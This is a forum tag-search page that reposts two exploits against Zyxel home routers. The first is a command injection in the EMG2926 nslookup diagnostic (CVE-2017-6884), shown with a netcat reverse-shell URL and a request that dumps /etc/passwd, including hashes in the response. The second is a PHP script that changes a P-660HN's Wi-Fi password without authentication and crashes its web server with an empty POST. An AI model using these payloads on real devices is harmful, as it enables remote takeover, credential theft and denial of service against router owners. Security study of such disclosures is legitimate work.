Jump to content

Search the Community

Showing results for tags 'zyxel'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 2 results

  1. [Sursa: https://www.exploit-db.com/exploits/41782/?rss ] # Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection # Date: 2017-04-02 # Exploit Author: Fluffy Huffy (trevor Hough) # Vendor Homepage: www.zyxel.com # Version: EMG2926 - V1.00(AAQT.4)b8 # Tested on: linux # CVE : CVE-2017-6884 OS command injection vulnerability was discovered in a commonly used home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools specify the nslookup function. A malicious user may exploit numerous vectors to execute arbitrary commands on the router. Exploit (Reverse Shell) https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button& ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p Exploit (Dump Password File) Request GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1 Host: 192.168.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup Accept-Language: en-US,en;q=0.8 Cookie: csd=9; sysauth=<Clipped> Connection: close Response (Clipped) <textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash daemon:*:1:1:daemon:/var:/bin/false ftp:*:55:55:ftp:/home/ftp:/bin/false network:*:101:101:network:/var:/bin/false nobody:*:65534:65534:nobody:/var:/bin/false supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash admin:$1$<Clipped>:0:0:admin:/:/bin/fail
  2. <?php /* Exploit Title : ZYXEL remote configuration editor / Web Server DoS Date : 23 April 2015 Exploit Author : Koorosh Ghorbani Site : http://8thbit.net/ Vendor Homepage : http://www.zyxel.com/ Platform : Hardware Tested On : ZyXEL P-660HN-T1H_IPv6 Firmware Version: 1.02(VLU.0) -------------------------- Unattended remote access -------------------------- ZYXEL Embedded Software does not check Cookies And Credentials on POST method so attackers could changes settings and view pages with post method . -------------------------- DoS Web Server -------------------------- sending empty Post to admin pages will crash internal web server and router needs to hard reset . */ $banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n"; print $banner; function Post($packet,$host) { try { $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $host); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS, $packet); curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0"); curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp"); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($curl); curl_close($curl); return $result; }catch (Exception $e ){ echo $e->getMessage(); return "" ; } } if(sizeof($argv) < 3) { print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n"; exit(1); } $host = $argv[1]; $password = urlencode($argv[2]); $packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ; $target = "http://$host/cgi-bin/WLAN_General.asp"; if(strlen(Post($packet,$target)) > 0){ print "Seems Changed !"; }else{ print "Humm , No Chance !"; } //DoS : Post("",$target) ; ?> Source: http://packetstorm.wowhacker.com/1504-exploits/zyxel-dos.txt
×
×
  • Create New...